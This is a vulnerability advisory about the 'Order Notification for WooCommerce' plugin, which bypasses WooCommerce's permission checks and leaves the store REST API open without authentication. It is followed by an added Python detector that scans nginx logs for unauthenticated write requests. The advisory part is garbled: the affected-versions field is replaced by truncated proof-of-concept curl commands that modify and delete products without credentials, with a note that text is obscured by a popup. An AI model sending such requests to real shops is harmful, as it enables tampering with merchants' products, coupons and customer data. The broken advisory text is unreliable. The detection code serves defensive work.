### Vulnerability Overview

This vulnerability exists in the **Order Notification for WooCommerce** plugin. The plugin incorrectly overrides WooCommerce's permission check mechanism, so requests are granted full access without any authentication. This enables attackers to fully read and write store resources, including products, coupons, and customers.

### Scope of Impact

* **Plugin Name:** Order Notification for WooCommerce
* **Affected Versions:**

```bash
# ...)
curl -i -X PUT "http://localhost:10005/wp-json/wc/v3/products/" -H "Content-Type: application/json" --data '{"regular_price"...

# 4) Delete the created product (replace )
curl -i -X DELETE "http://localhost:10005/wp-json/wc/v3/products/?force=true"

# 5) Create a coupon without authentication
curl -i -X ...
# (partially obscured by a popup)
```
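
Detection logic for the behaviour described above, added here and not part of the original advisory or the plugin: it scans access logs for successful write requests to `/wp-json/wc/v3/` that carry no Basic-auth user and no `consumer_key` query parameter. It assumes nginx's combined log format; the log lines, addresses, product IDs and keys are constructed. Credentials sent only in other headers or cookies are not visible in this format, so hits are leads for review.

```python
import re

# nginx "combined" format; $remote_user is the HTTP Basic user name, "-" when absent.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


def unauthenticated_writes(lines):
    """Return (ip, method, uri) for 2xx wc/v3 writes with no visible credential."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # malformed request line, skip
        path, _, query = m["uri"].partition("?")
        if not path.startswith("/wp-json/wc/v3/"):
            continue
        if m["method"] not in WRITE_METHODS or not m["status"].startswith("2"):
            continue  # reads, and writes the server rejected, are not flagged
        # "consumer_key=" also matches the OAuth 1.0a parameter oauth_consumer_key=
        if m["user"] != "-" or "consumer_key=" in query:
            continue
        hits.append((m["ip"], m["method"], m["uri"]))
    return hits


# Constructed sample log lines (documentation addresses, placeholder IDs and keys).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "PUT /wp-json/wc/v3/products/101 HTTP/1.1" 200 512 "-" "curl/8.5.0"',
    '203.0.113.7 - - [01/Jan/2025:10:00:02 +0000] "DELETE /wp-json/wc/v3/products/101?force=true HTTP/1.1" 200 498 "-" "curl/8.5.0"',
    '203.0.113.7 - - [01/Jan/2025:10:00:03 +0000] "POST /wp-json/wc/v3/coupons HTTP/1.1" 201 377 "-" "curl/8.5.0"',
    '203.0.113.9 - - [01/Jan/2025:10:00:04 +0000] "POST /wp-json/wc/v3/products HTTP/1.1" 401 120 "-" "curl/8.5.0"',
    '198.51.100.20 - ck_example [01/Jan/2025:10:00:05 +0000] "POST /wp-json/wc/v3/products HTTP/1.1" 201 640 "-" "erp-sync/1.0"',
    '198.51.100.20 - - [01/Jan/2025:10:00:06 +0000] "GET /wp-json/wc/v3/products HTTP/1.1" 200 9000 "-" "erp-sync/1.0"',
    '198.51.100.21 - - [01/Jan/2025:10:00:07 +0000] "POST /wp-json/wc/v3/orders?consumer_key=ck_example&consumer_secret=cs_example HTTP/1.1" 201 800 "-" "pos/2.1"',
    '198.51.100.30 - - [01/Jan/2025:10:00:08 +0000] "-" 400 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in unauthenticated_writes(SAMPLE):
        print(hit)
```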